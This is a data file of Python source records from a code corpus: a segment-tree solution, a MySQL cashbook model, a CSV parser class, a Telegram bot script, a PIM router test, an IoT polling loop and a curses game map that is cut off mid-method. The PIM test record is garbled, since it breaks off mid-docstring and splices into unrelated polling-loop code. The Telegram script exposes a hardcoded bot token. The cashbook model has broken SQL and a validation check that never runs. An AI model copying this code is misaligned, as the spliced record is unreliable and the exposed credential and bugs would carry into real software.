+{"seq_id":"557363510","text":"\"\"\"\nDefinition of Interval.\nclass Interval(object):\n def __init__(self, start, end):\n self.start = start\n self.end = end\n\"\"\"\nclass SegmentTreeNode(object):\n def __init__(self, start, end, min):\n self.start, self.end, self.min = start, end, min\n self.left, self.right = None, None\n\nclass Solution:\t\n \"\"\"\n @param A, queries: Given an integer array and an Interval list\n The ith query is [queries[i-1].start, queries[i-1].end]\n @return: The result list\n \"\"\"\n\n def build(self, A, start, end):\n if start > end:\n return\n\n root = SegmentTreeNode(start, end, None)\n if start != end:\n mid = (start + end) / 2\n root.left = self.build(A, start, mid)\n root.right = self.build(A, mid+1, end)\n root.min = min(root.left.min, root.right.min)\n else:\n root.min = A[start]\n\n return root\n\n def query(self, root, start, end):\n if root.start == start and root.end == end:\n return root.min\n\n mid = (root.start + root.end) / 2\n lmin, rmin = None, None\n if start <= mid:\n if end <= mid:\n return self.query(root.left, start, end)\n else:\n lmin = self.query(root.left, start, mid)\n \n if end > mid:\n if start > mid:\n return self.query(root.right, start, end)\n else:\n rmin = self.query(root.right, mid+1, end)\n \n return min(lmin, rmin) if lmin is not None and rmin is not None \\\n else max(lmin, rmin)\n \n\n\n def intervalMinNumber(self, A, queries):\n root = self.build(A, 0, len(A)-1)\n\n res = []\n for query in queries:\n res.append(self.query(root, query[0], query[1]))\n\n return res\n \nif __name__ == '__main__':\n s = Solution()\n s.intervalMinNumber([1, 2, 7, 8, 5], [[1,2],[0,4],[2,4]])","sub_path":"SegmentTree/IntervalMinimumNumber.py","file_name":"IntervalMinimumNumber.py","file_ext":"py","file_size_in_byte":1979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"478397494","text":"import MySQLdb\nimport datetime\nfrom decimal import Decimal\n\nfrom db import DBConnector\nfrom model.project import project\n\nclass cashbook:\n \"\"\"現金出納帳モデル\"\"\"\n\n def __init__(self):\n self.attr = {}\n self.attr[\"id\"] = None\n self.attr[\"user_id\"] = None\n self.attr[\"ym\"] = None\n self.attr[\"date\"] = None\n self.attr[\"summary\"] = None\n self.attr[\"detail\"] = None\n self.attr[\"income\"] = None\n self.attr[\"expenses\"] = None\n self.attr[\"amount\"] = None\n self.attr[\"last_updated\"] = None\n\n @staticmethod\n def migrate():\n\n # データベースへの接続とカーソルの生成\n with DBConnector(dbName=None) as con, con.cursor() as cursor:\n # データベース生成\n cursor.execute('CREATE DATABASE IF NOT EXISTS db_%s;' % project.name())\n # 生成したデータベースに移動\n cursor.execute('USE db_%s;' % project.name())\n # テーブル初期化(DROP)\n cursor.execute('DROP TABLE IF EXISTS table_cashbook;')\n # テーブル初期化(CREATE)\n cursor.execute(\"\"\"\n CREATE TABLE `table_cashbook` (\n `id` int(11) unsigned NOT NULL AUTO_INCREMENT,\n `user_id` int(11) unsigned NOT NULL,\n `ym` int(11) NOT NULL,\n `date` date NOT NULL,\n `summary` varchar(255) DEFAULT NULL,\n `detail` text,\n `income` decimal(12,0) NOT NULL DEFAULT '0',\n `expenses` decimal(12,0) NOT NULL DEFAULT '0',\n `amount` decimal(12,0) NOT NULL DEFAULT '0',\n `last_updated` datetime NOT NULL,\n PRIMARY KEY (`id`),\n KEY `user_id` (`user_id`),\n KEY `summary` (`summary`)\n )\"\"\")\n con.commit()\n\n @staticmethod\n def db_cleaner():\n with DBConnector(dbName=None) as con, con.cursor() as cursor:\n cursor.execute('DROP DATABASE IF EXISTS db_%s;' % project.name())\n con.commit()\n\n @staticmethod\n def find(id):\n with DBConnector(dbName='db_%s' % project.name()) as con, \\\n con.cursor(MySQLdb.cursors.DictCursor) as cursor:\n cursor.execute(\"\"\"\n SELECT *\n FROM table_cashbook\n WHERE id = %s;\n \"\"\", (id,))\n results = cursor.fetchall()\n\n if (len(results) == 0):\n return None\n data = results[0]\n cb = cashbook()\n cb.attr[\"id\"] = data[\"id\"]\n cb.attr[\"user_id\"] = data[\"user_id\"]\n cb.attr[\"ym\"] = data[\"ym\"]\n cb.attr[\"date\"] = data[\"date\"]\n cb.attr[\"summary\"] = data[\"summary\"]\n cb.attr[\"detail\"] = data[\"detail\"]\n cb.attr[\"income\"] = data[\"income\"]\n cb.attr[\"expenses\"] = data[\"expenses\"]\n cb.attr[\"amount\"] = data[\"amount\"]\n cb.attr[\"last_updated\"] = data[\"last_updated\"]\n return cb\n\n def is_valid(self):\n return all([\n self.attr[\"id\"] is None or type(self.attr[\"id\"]) is int,\n self.attr[\"user_id\"] is not None and type(self.attr[\"user_id\"]) is int,\n self.attr[\"ym\"] is not None and type(self.attr[\"ym\"]) is int and len(str(self.attr[\"ym\"])) == 6,\n self.attr[\"date\"] is not None and type(self.attr[\"date\"]) is datetime.date,\n self.attr[\"summary\"] is not None and type(self.attr[\"summary\"]) is str and len(self.attr[\"summary\"]) > 0,\n self.attr[\"detail\"] is None or type(self.attr[\"detail\"]) is str,\n self.attr[\"income\"] is not None and type(self.attr[\"income\"]) is Decimal,\n self.attr[\"expenses\"] is not None and type(self.attr[\"expenses\"]) is Decimal,\n self.attr[\"amount\"] is not None and type(self.attr[\"amount\"]) is Decimal and self.attr[\"amount\"] == self.attr[\"income\"] - self.attr[\"expenses\"],\n self.attr[\"last_updated\"] is not None and type(self.attr[\"last_updated\"]) is datetime.datetime\n ])\n\n\n @staticmethod\n def build():\n now = datetime.datetime.now()\n cb = cashbook()\n # defaultが設定されている変数はdefault値にしておくと良い\n # 日付も予め値が入っていた方が良い\n # 
入力が必要な物はNoneのままにしておく\n cb.attr[\"ym\"] = now.year*100 + now.month\n cb.attr[\"date\"] = now.date()\n #cb.attr[\"summary\"] = None\n #cb.attr[\"detail\"] = None\n cb.attr[\"income\"] = Decimal(0)\n cb.attr[\"expenses\"] = Decimal(0)\n cb.attr[\"amount\"] = Decimal(0)\n cb.attr[\"last_updated\"] = now\n return cb\n\n def save(self):\n if(self.is_valid):\n return self._db_save()\n return False\n\n def _db_save(self):\n if self.attr[\"id\"] == None:\n return self._db_save_insert()\n return self._db_save_update()\n\n def _db_save_insert(self):\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # データの保存(INSERT)\n cursor.execute(\"\"\"\n INSERT INTO table_cashbook\n (user_id, ym, date, summary, detail, income, expenses, amount, last_updated)\n VALUES\n (%s, %s, %s, %s, %s, %s, %s, %s, %s); \"\"\",\n (self.attr[\"user_id\"],\n self.attr[\"ym\"],\n self.attr[\"date\"],\n self.attr[\"summary\"],\n self.attr[\"detail\"],\n self.attr[\"income\"],\n self.attr[\"expenses\"],\n self.attr[\"amount\"],\n '{0:%Y-%m-%d %H:%M:%S}'.format(self.attr[\"last_updated\"])))\n \n # INSERTされたAUTO INCREMENT値を取得\n cursor.execute(\"SELECT last_insert_id();\")\n results = cursor.fetchone()\n self.attr[\"id\"] = results[0]\n\n con.commit()\n\n return self.attr[\"id\"]\n \n def _db_save_update(self):\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # データの保存(UPDATE)\n cursor.execute(\"\"\"\n UPDATE table_cashbook\n SET user_id = %s,\n ym = %s,\n date = %s,\n summary = %s,\n detail = %s,\n income = %s,\n expenses = %s,\n amount = %s,\n last_updatedemail = %s\n WHERE id = %s; \"\"\",\n (self.attr[\"user_id\"],\n self.attr[\"ym\"],\n self.attr[\"date\"],\n self.attr[\"summary\"],\n self.attr[\"detail\"],\n self.attr[\"income\"],\n self.attr[\"expenses\"],\n self.attr[\"amount\"],\n '{0:%Y-%m-%d %H:%M:%S}'.format(self.attr[\"last_updated\"]),\n self.attr[\"id\"]))\n con.commit()\n \n return self.attr[\"id\"]\n\n @staticmethod\n def select_by_user_id(user_id):\n with DBConnector(dbName='db_%s' % project.name()) as con, \\\n con.cursor(MySQLdb.cursors.DictCursor) as cursor:\n cursor.execute(\"\"\"\n SELECT *\n FROM table_cashbook\n WHERE user_id = %s;\n \"\"\", (user_id,))\n results = cursor.fetchall()\n \n records = []\n for data in results:\n cb = cashbook()\n cb.attr[\"id\"] = data[\"id\"]\n cb.attr[\"user_id\"] = data[\"user_id\"]\n cb.attr[\"ym\"] = data[\"ym\"]\n cb.attr[\"date\"] = data[\"date\"]\n cb.attr[\"summary\"] = data[\"summary\"]\n cb.attr[\"detail\"] = data[\"detail\"]\n cb.attr[\"income\"] = data[\"income\"]\n cb.attr[\"expenses\"] = data[\"expenses\"]\n cb.attr[\"amount\"] = data[\"amount\"]\n cb.attr[\"last_updated\"] = data[\"last_updated\"]\n records.append(cb)\n\n return records\n \n def delete(self):\n if self.attr[\"id\"] == None: return None\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # データの削除(DELETE)\n cursor.execute(\"\"\"\n DELETE FROM table_cashbook\n WHERE id = %s; \"\"\",\n (self.attr[\"id\"],))\n con.commit()\n\n return self.attr[\"id\"]\n \n @staticmethod\n def _index(user_id):\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # 対応するidをリストで返す\n cursor.execute(\"\"\"\n SELECT id FROM table_cashbook\n WHERE user_id = %s; \"\"\",\n (user_id,))\n con.commit()\n recodes = cursor.fetchall()\n \n ids = [recode[0] for recode in recodes]\n return ids\n\n \n @staticmethod\n def summary(user_id, summary):\n with DBConnector(dbName='db_%s' % project.name()) as 
con, con.cursor() as cursor:\n cursor.execute(\"\"\"\n SELECT id\n FROM table_cashbook\n WHERE user_id = %s and summary = %s\n ORDER BY date ASC;\n \"\"\",(user_id,summary,))\n con.commit()\n recodes = cursor.fetchall()\n\n cb_list = [cashbook.find(recode[0]) for recode in recodes]\n return cb_list\n\n @staticmethod\n def ym(user_id, ym):\n with DBConnector(dbName='db_%s' % project.name()) as con, con.cursor() as cursor:\n # 対応するidをリストで返す\n cursor.execute(\"\"\"\n SELECT id FROM table_cashbook\n WHERE `user_id` = %s and `ym` = %s; \"\"\",\n (user_id, ym))\n con.commit()\n recodes = cursor.fetchall()\n \n cb_list = [cashbook.find(recode[0]) for recode in recodes]\n return cb_list\n","sub_path":"app/model/cashbook.py","file_name":"cashbook.py","file_ext":"py","file_size_in_byte":9951,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"584096121","text":"class StyleInfo:\n\n\tDELIMITER = ','\n\n\tdef __init__(self, csvData):\t\t\n\t\tself.StyleColor = csvData[0]\n\t\tself.USDEPTretail = csvData[1]\n\t\tself.DIV2 = csvData[2]\n\t\tself.DEL2 = csvData[3]\n\t\tself.Wxx2 = csvData[4]\n\t\tself.Wxx1 = csvData[5]\n\t\tself.Wxx = csvData[6]\n\t\tself.RETAILSALESINEUROSWxx2 = csvData[7]\n\t\tself.RETAILSALESINEUROSWxx1 = csvData[8]\n\t\tself.RETAILSALESINEUROSWxx = csvData[9]\n\t\tself.GMw1shortage = csvData[10]\n\t\tself.POS = csvData[11]\n\t\tself.OHStoreLC = csvData[12]\n\t\tself.OHWHSPLC = csvData[13]\n\t\tself.TTLOHLC = csvData[14]\n\t\tself.YEAR = csvData[15]\n\t\tself.Dateofextraction = csvData[16]\n\t\tself.Brand = csvData[17]\n\t\tself.numofStores = csvData[18]\n\t\tself.USConfDpt = csvData[19]\n\t\tself.Usdept = csvData[20]\n\t\tself.Usdeptdescription = csvData[21]\n\t\tself.Dpt = csvData[22]\n\t\tself.DIV = csvData[23]\n\t\tself.DEPT = csvData[24]\n\t\tself.AMSSN = csvData[25]\n\t\tself.Delivery = csvData[26]\n\t\tself.DEL = csvData[27]\n\t\tself.DELSSN = csvData[28]\n\t\tself.AMSTYLECLR = csvData[29]\n\t\tself.AMStyle = csvData[30]\n\t\tself.Amcolor = csvData[31]\n\t\tself.Firstdistrodate = csvData[32]\n\t\tself.FIRSTDISTRO = csvData[33]\n\t\tself.ESSENTIALREORDER = csvData[34]\n\t\tself.amp = csvData[35]\n\t\tself.FAB = csvData[36]\n\t\tself.BCBGStyle = csvData[37]\n\t\tself.BCBGColor = csvData[38]\n\t\tself.CLRDESC = csvData[39]\n\t\tself.CLS = csvData[40]\n\t\tself.STYLEDESC = csvData[41]\n\t\tself.Styledescription = csvData[42]\n\t\tself.FobCostEuro = csvData[43]\n\t\tself.LandedCostEuro = csvData[44]\n\t\tself.Retailprice = csvData[45]\n\t\tself.RetailpriceEuroArea = csvData[46]\n\t\tself.RTLOHSTR_NOTAX = csvData[47]\n\t\tself.RTLOHWHSPHYS = csvData[48]\n\t\tself.RTLOHTTL_NOTAX = csvData[49]\n\t\tself.UnitsOHStores = csvData[50]\n\t\tself.UnitsOHWhsAvailable = csvData[51]\n\t\tself.UnitsOHWhsPhysical = csvData[52]\n\t\tself.TTLUNITS = csvData[53]\n\t\tself.INSTOREAPS = csvData[54]\n\t\tself.AURSLS = csvData[55]\n\t\tself.W47 = csvData[56]\n\t\tself.W48 = csvData[57]\n\t\tself.W49 = csvData[58]\n\t\tself.W50 = csvData[59]\n\t\tself.W51 = csvData[60]\n\t\tself.W52 = csvData[61]\n\t\tself.W1 = csvData[62]\n\t\tself.W2 = csvData[63]\n\t\tself.W3 = csvData[64]\n\t\tself.WOWbuild = csvData[65]\n\t\tself.RetailSalesMTD = csvData[66]\n\t\tself.MarkdownMTD = csvData[67]\n\t\tself.UnitssalesYTD = csvData[68]\n\t\tself.RetailsalesYTD = csvData[69]\n\t\tself.SALESMD = csvData[70]\n\t\tself.MarkdownYTD = csvData[71]\n\t\tself.StoreUnitSTW3 = csvData[72]\n\t\tself.StoreUnitWOSW3 = csvData[73]\n\t\tself.YTDST = csvData[74]\n\t\tself.RetailsalesinEurosW47 = csvData[75]\n\t\tself.RetailsalesinEurosW48 = csvData[76]\n\t\tself.RetailsalesinEurosW49 = csvData[77]\n\t\tself.RetailsalesinEurosW50 = csvData[78]\n\t\tself.RetailsalesinEurosW51 = csvData[79]\n\t\tself.RetailsalesinEurosW52 = csvData[80]\n\t\tself.RetailsalesinEurosW1 = csvData[81]\n\t\tself.RetailsalesinEurosW2 = csvData[82]\n\t\tself.RetailsalesinEurosW3 = csvData[83]\n\t\tself.MarkdownInEurosW3 = csvData[84]\n\t\tself.RetailsalesinEurosW4 = csvData[85]\n\t\tself.Receiptssize2 = csvData[86]\n\t\tself.Receiptssize3 = csvData[87]\n\t\tself.Receiptssize4 = csvData[88]\n\t\tself.Receiptssize5 = csvData[89]\n\t\tself.Receiptssize6 = csvData[90]\n\t\tself.Receiptssize7 = csvData[91]\n\t\tself.Receiptssize8 = csvData[92]\n\t\tself.Receiptssize9 = csvData[93]\n\t\tself.Receiptssize10 = csvData[94]\n\t\tself.Receiptssize11 = csvData[95]\n\t\tself.Receiptssize12 = 
csvData[96]\n\t\tself.TOTALRECEIPTS = csvData[97]\n\t\tself.ReturnTransit = csvData[98]\n\t\tself.Shipmenttransit = csvData[99]\n\t\tself.FactorypriceEuro = csvData[100]\n\t\tself.BRAND = csvData[101]\n\t\tself.FOCUS = csvData[102]\n\t\tself.DAYEVE = csvData[103]\n\t\tself.GBB = csvData[104]\n\t\tself.SSFWMDLIST = csvData[105]\n\t\tself.x = csvData[106]\n\t\tself.x = csvData[107]\n\t\tself.x = csvData[108]\n\t\tself.SSMDLISTPP = csvData[109]\n\t\tself.MD_HARD_POS = csvData[110]\t\t\n\t\tself.MD_HARD_POS_REG = csvData[111]\n\t\tself.HARDMARK_REG = csvData[112]\n\t\tself.OLD = csvData[113]\n\t\tself.INSTORE_WHS_not_OLD = csvData[114]\n\t\tself.PE = csvData[115]\n\t\t\n\tdef reduced(self):\t\t\n\t\tsinfo = self.Brand + self.DELIMITER + self.DIV + self.DELIMITER\n\t\tsinfo += self.AMSSN + self.DELIMITER + self.Delivery + self.DELIMITER\n\t\tsinfo += self.AMStyle + self.DELIMITER + self.Amcolor + self.DELIMITER\n\t\tsinfo += self.StyleColor + self.DELIMITER + self.BCBGStyle + self.DELIMITER\n\t\tsinfo += self.BCBGColor + self.DELIMITER + self.CLRDESC + self.DELIMITER\n\t\tsinfo += self.STYLEDESC + self.DELIMITER + self.Retailprice\n\t\treturn sinfo","sub_path":"styleinfo.py","file_name":"styleinfo.py","file_ext":"py","file_size_in_byte":4299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"9848587","text":"import json\nimport requests\n\n\"\"\"Запрос https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/getMe\"\"\"\n# r = requests.get(URLbot + 'getMe')\n# write_json(r.json())\n\nURL = 'https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/'\n\n\ndef write_json(data, filename = 'answer.json'):\n \"\"\"Получение json данных в файл\"\"\"\n with open(filename, 'w') as f:\n json.dump(data, f, indent=2,\n ensure_ascii=False)\n\n\ndef get_updates():\n \"\"\" Запрос обновлений в чате бота https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/getUpdates\"\"\"\n url = URL + 'getUpdates'\n r = requests.get(url)\n #write_json(r.json())\n return r.json()\n\n\ndef send_message(chat_id, text = 'Test'):\n \"\"\"Отправка сообщений в чат бота\"\"\"\n url = URL + 'sendMessage'\n answer = { # словарь для передачи методом post\n 'chat_id': chat_id,\n 'text': text\n }\n r = requests.post(url, json = answer)\n return r.json()\n\n\ndef main():\n \"\"\"Запрос https://api.telegram.org/bot504306281:AAHbh_Bq3JzqAOu7CcM68b6EQ5rI1EZfuTk/getMe\"\"\"\n r = requests.get(URL + 'getMe')\n write_json(r.json())\n\nif __name__ == '__main__':\n # main()\n r = get_updates()\n # Распарсить ответ от Telegram:\n chat_id = r['result'][-1]['message']['chat']['id']\n send_message(chat_id, 'Текст')","sub_path":"testJson.py","file_name":"testJson.py","file_ext":"py","file_size_in_byte":1510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"289396065","text":"'''\nCreated on Feb 9, 2016\n\n@author: alex\n'''\nimport types\nimport unittest\nimport math\n\nfrom des.entities.network_entity import NetworkEntity\nfrom des.entities.node import Node\nfrom des.event.network import NetworkEvent\nfrom pim_dm.router.router import Router\nfrom pim_dm.router.tree.downstream.interface_state import Downstream\nimport pim_dm.router.tree.downstream.state as down_sm\nimport pim_dm.router.tree.pim_assert.state as assert_sm\nfrom pim_dm.router.tree.tree_id import TreeId\nfrom pim_dm.router.tree.tree_interface import TreeInterface\nfrom pim_dm.router.tree.upstream.interface_state import Upstream\nimport pim_dm.router.tree.upstream.state as up_sm\nfrom tests.test_base import TestBase, Object\nfrom topologies import test_base_topo\n\nclass TestPIM(TestBase):\n def setUp(self):\n settings = Object()\n settings.NODES = test_base_topo.pim\n\n TestBase.setUp(self, settings=settings)\n\n self.sim_setup()\n\n def set_members(self, node: str, value: bool, time=None) -> None:\n r_t = NetworkEntity.get(node)._daemons[Router.NAME]\n\n def _set_mm():\n r_t.set_has_members(value)\n\n if time is None:\n _set_mm()\n else:\n assert isinstance(time, (int, float))\n self.schedule_action(time, _set_mm)\n\n def _get_S(self) -> Node:\n '''\n @rtype: Node\n '''\n return NetworkEntity.get('S')\n\n def _get_SG(self) -> tuple:\n '''\n @rtype: Node\n '''\n return TreeId(self._get_S(), 'g1')\n\n def _schedule_missfire(self, time: float, rname: str, sname: str, fname:\n str):\n \"\"\"\n Schedules a msg to be \"lost\" at a given time.\n This is done by replacing the function which sends the msg by _msg_missfire\n \"\"\"\n\n # so that the Join msg is not sent,\n # but the object must exist and be instantized therefore 26 secs\n def _msg_missfire():\n n_r = NetworkEntity.get(rname)._daemons[Router.NAME]\n n_t = n_r.get_tree(self._get_SG())\n sn = NetworkEntity.get(sname)\n n_sn = n_t._tree_ifs[sn]\n n_sn.rprint(\"dropping message: \" + fname)\n\n # In python methods and functions are different types.\n # The MethodType is then necessary to bind a function to a\n # object instance as to correctly pass 'self' to the function (or method)\n # http://stackoverflow.com/questions/972/adding-a-method-to-an-existing-object-instance\n setattr(n_sn, fname, types.MethodType(\n getattr(TreeInterface, fname), n_sn))\n\n def _set_missfire():\n n_r = NetworkEntity.get(rname)._daemons[Router.NAME]\n n_t = n_r.get_tree(self._get_SG())\n sn = NetworkEntity.get(sname)\n n_sn = n_t._tree_ifs[sn]\n\n setattr(n_sn, fname, _msg_missfire)\n\n self.schedule_action(time, _set_missfire)\n\n def assert_routers(self, tests) -> dict:\n \"\"\"\n performs asserts for interfaces and state machines\n\n and places entities in the returned dict in the following format\n\n entries in tests must be in either\n [ + 1 second\n\tstarttime = time.time()\n\t\n\t# prints counter to display progress of loop\n\tprint(\"\\nCount: \" + str(count))\n\tprint(\"Time: \" + str(time.time()))\n\t\n\t# receives status of signal from API, prints to terminal\n\tUnitB_status = aio.receive('status-b').value\n\tprint(\"Unit B Signal State: \" + str(UnitB_status))\n\t\n\tif count == 10:\n\t\t# creates a thread to allow the data send process to run in parallel\n\t\tdata_send_thread = threading.Thread(target = data_send)\n\t\t# starts the thread\n\t\tdata_send_thread.start()\n\t\t\n\t\t# resets count to start loop again\n\t\tcount = 0\n \n\t# increments loop\n\tcount = count + 1\n\t# sleeps process for the rest of the 
second\n\t# takes process time and removes it from the second, then sleeps for remaining time\n\ttime.sleep(1.0 - ((time.time() - starttime) % 60))\n","sub_path":"Other/UnitB1.py","file_name":"UnitB1.py","file_ext":"py","file_size_in_byte":2621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"369376986","text":"\"\"\"\nGame map interface\n\"\"\"\nimport curses\nimport json\nimport logging\nimport random\nfrom pathlib import Path\nfrom pprint import pformat\nfrom typing import List, Set, Tuple\n\nimport constants\nimport globals\nfrom dialog import Dialog\nfrom items import Consumable, Equipment, Weapon\nfrom monster import Monster\nfrom player import Player, Position\nfrom user_interface import UserInterface\nfrom utility import color\n\n\nclass GameMap(UserInterface):\n \"\"\"\n Main User Interface to show current\n position, current map, current health,\n current power and the event log\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.event_log = None\n self.map = None\n self.status_info = None\n self.levels = list()\n self.level_width = 51\n self.level_height = 15\n self.levels = list()\n self.items = dict()\n self.monsters = dict()\n self.starting_positions = list()\n self.stories_shown = set()\n for index, file in enumerate(\n sorted(\n (Path(__file__).parent.parent / 'resources' / 'levels')\n .glob('*.level'),\n key=lambda x: int(x.stem)\n )\n ):\n with file.open() as level:\n self.levels.append(self.parse_level(level.read(), index))\n self.player = Player(Position(self.level_width, self.level_height,\n layouts=self.levels))\n self.player.position.x, self.player.position.y = \\\n self.starting_positions[0]\n self._last_position = self.current_position\n self.visited: List[Set[Tuple[int, int]]] = [set() for _ in\n range(len(self.levels))]\n self.seen: List[Set[Tuple[int, int]]] = [set() for _ in\n range(len(self.levels))]\n self.setup()\n\n @property\n def health_bar(self):\n health_bar = int(10 * (self.player.current_health\n / self.player.max_health)) * constants.HEALTH\n return health_bar\n\n @property\n def current_value(self) -> str:\n return self.levels[self.player.level][self.player.y][self.player.x]\n\n @current_value.setter\n def current_value(self, value: str):\n self.levels[self.player.level][self.player.y][self.player.x] = value\n\n @property\n def current_position(self):\n return self.player.x, self.player.y\n\n def save_game(self):\n data = {\n 'monsters': {str(key): vars(monster) for key, monster in\n self.monsters.items()},\n 'items': {str(key): vars(item) for key, item in\n self.items.items()},\n 'starting_positions': [list(position) for position in\n self.starting_positions],\n 'levels': self.levels,\n 'player_items': {\n 'head': vars(self.player.head) if self.player.head else None,\n 'chest': vars(self.player.chest)\n if self.player.chest else None,\n 'legs': vars(self.player.legs) if self.player.legs else None,\n 'feet': vars(self.player.feet) if self.player.feet else None,\n 'weapon': vars(self.player.weapon)\n if self.player.weapon else None,\n 'cookies': [vars(cookie) for cookie in self.player.cookies\n if cookie]\n },\n 'damage': self.player.damage,\n 'last_position': list(self._last_position),\n 'level': self.player.level,\n 'current_position': list(self.current_position),\n 'visited': [[list(position) for position in level] for level in\n self.visited],\n 'seen': [[list(position) for position in level] for level in\n self.seen],\n 'stories_shown': list(self.stories_shown)\n }\n with (Path(__file__).parent.parent / 'savegame.json').open(mode='w') \\\n as file:\n logging.info(pformat(data))\n json.dump(data, file, default=lambda x: vars(x))\n\n @classmethod\n def load_game(cls, filename: str):\n with (Path(__file__).parent.parent / filename).open() as file:\n data = json.load(file)\n game_map = cls()\n for position, 
monster_data in data['monsters'].items():\n position = tuple(int(i) for i in position[1:-1].split(', '))\n monster = Monster(1)\n monster.strength = monster_data['strength']\n monster.name = monster_data['name']\n game_map.monsters[position] = monster\n for position, item_data in data['items'].items():\n position = tuple(int(i) for i in position[1:-1].split(', '))\n item = Consumable(1) if item_data['type'] == 'Keks' \\\n else Equipment(1)\n item.name = item_data['name']\n item.factor = item_data['factor']\n item.type = item_data['type']\n game_map.items[position] = item\n game_map.starting_positions = [tuple(position) for position in\n data['starting_positions']]\n game_map.levels = data['levels']\n head = data['player_items']['head']\n chest = data['player_items']['chest']\n legs = data['player_items']['legs']\n feet = data['player_items']['feet']\n weapon = data['player_items']['weapon']\n cookies = data['player_items']['cookies']\n game_map.player.head = head if not head else Equipment(1)\n if head:\n game_map.player.head.factor = head['factor']\n game_map.player.head.name = head['name']\n game_map.player.head.type = head['type']\n game_map.player.chest = chest if not chest else Equipment(1)\n if chest:\n game_map.player.chest.factor = chest['factor']\n game_map.player.chest.name = chest['name']\n game_map.player.chest.type = chest['type']\n game_map.player.legs = legs if not legs else Equipment(1)\n if legs:\n game_map.player.legs.factor = legs['factor']\n game_map.player.legs.name = legs['name']\n game_map.player.legs.type = legs['type']\n game_map.player.feet = feet if not feet else Equipment(1)\n if feet:\n game_map.player.feet.factor = feet['factor']\n game_map.player.feet.name = feet['name']\n game_map.player.feet.type = feet['type']\n game_map.player.weapon = weapon if not weapon else Weapon(1)\n if weapon:\n game_map.player.weapon.factor = weapon['factor']\n game_map.player.weapon.name = weapon['name']\n game_map.player.weapon.type = weapon['type']\n game_map.player.cookies = list()\n for cookie_data in cookies:\n cookie = Consumable(1)\n cookie.factor = cookie_data['factor']\n cookie.name = cookie_data['name']\n cookie.type = cookie_data['type']\n game_map.player.cookies.append(cookie)\n game_map.player.position._level = data['level']\n game_map.player.damage = data['damage']\n game_map._last_position = (data['last_position'][0],\n data['last_position'][1])\n game_map.player.position._x = data['current_position'][0]\n game_map.player.position._y = data['current_position'][1]\n game_map.visited = [set(tuple(position) for position in level) for\n level in data['visited']]\n game_map.seen = [set(tuple(position) for position in level) for level\n in data['seen']]\n game_map.stories_shown = set(data['stories_shown'])\n return game_map\n\n def parse_level(self, level: str, level_number: int) -> List[List[str]]:\n level = level.replace('-', constants.HORIZONTAL)\n level = level.replace('|', constants.VERTICAL)\n level = level.replace('+', constants.CROSS)\n level = [[char for char in row]\n for row in level.split('\\n')]\n for y_index, row in enumerate(level):\n for x_index, value in enumerate(row):\n if x_index == 0 and y_index == 0:\n level[y_index][x_index] = constants.BOTTOM_RIGHT\n elif x_index == 0 and y_index == len(level) - 1:\n level[y_index][x_index] = constants.TOP_RIGHT\n elif x_index == len(row) - 1 and y_index == len(level) - 1:\n level[y_index][x_index] = constants.TOP_LEFT\n elif x_index == len(row) - 1 and y_index == 0:\n level[y_index][x_index] = 
constants.BOTTOM_LEFT\n elif y_index == 0 and value == constants.CROSS:\n level[y_index][x_index] = constants.TOP_OUT\n elif y_index == len(level) - 1 and value == constants.CROSS:\n level[y_index][x_index] = constants.BOTTOM_OUT\n elif x_index == 0 and value == constants.CROSS:\n level[y_index][x_index] = constants.LEFT_OUT\n elif x_index == len(row) - 1 and value == constants.CROSS:\n level[y_index][x_index] = constants.RIGHT_OUT\n if value == 'I':\n self.items[(level_number, x_index, y_index)] = \\\n random.choice((Consumable, Equipment,\n Weapon))(level_number + 1)\n elif value == 'M':\n self.monsters[(level_number, x_index, y_index)] = \\\n Monster(level_number + 1)\n elif value == '%':\n self.starting_positions.append((x_index, y_index))\n if level_number == 0:\n level[y_index][x_index] = ' '\n return level\n\n def level_value(self, x_index: int, y_index: int) -> str:\n return self.levels[self.player.level][y_index][x_index]\n\n def visit(self, x_index: int, y_index: int):\n for vertical in range(-1, 2):\n for horizontal in range(-1, 2):\n self.visited[self.player.level].add((x_index + horizontal,\n y_index + vertical))\n self.seen[self.player.level].add((x_index + horizontal,\n y_index + vertical))\n\n def see(self, x_index: int, y_index: int):\n for vertical in range(-1, 2):\n for horizontal in range(-1, 2):\n self.seen[self.player.level].add((x_index + horizontal,\n y_index + vertical))\n\n def log_event(self, message):\n self.event_log.move(1, 1)\n self.event_log.deleteln()\n self.event_log.move(self.event_log.getmaxyx()[0] - 2, 1)\n self.event_log.insertln()\n self.event_log.border()\n self.event_log.addstr(self.event_log.getmaxyx()[0] - 2, 1,\n message, color(foreground=curses.COLOR_YELLOW))\n\n def setup(self):\n self.screen = curses.newwin(0, 0)\n height, width = self.screen.getmaxyx()\n self.map = curses.newwin(self.level_height, self.level_width + 1,\n 2, width // 2 - self.level_width // 2)\n map_height, _ = self.map.getmaxyx()\n self.status_info = curses.newwin(3, width - 5, map_height + 2, 3)\n self.event_log = curses.newwin(height - (map_height + 6), width - 5,\n map_height + 5, 3)\n self.status_info.border()\n self.event_log.border()\n\n def refresh(self):\n self.screen.redrawwin()\n self.map.redrawwin()\n self.status_info.redrawwin()\n self.event_log.redrawwin()\n self.screen.refresh()\n self.map.refresh()\n self.status_info.refresh()\n self.event_log.refresh()\n\n def print(self):\n \"\"\"\n print game map to window\n \"\"\"\n if self.resized:\n self.resized = False\n self.setup()\n\n self.screen.addstr(1, 3, f\"Ebene {self.player.level}\")\n self.screen.addstr(1, 20, f'Position: {self.current_position}')\n\n if self.player.level < len(self.visited):\n 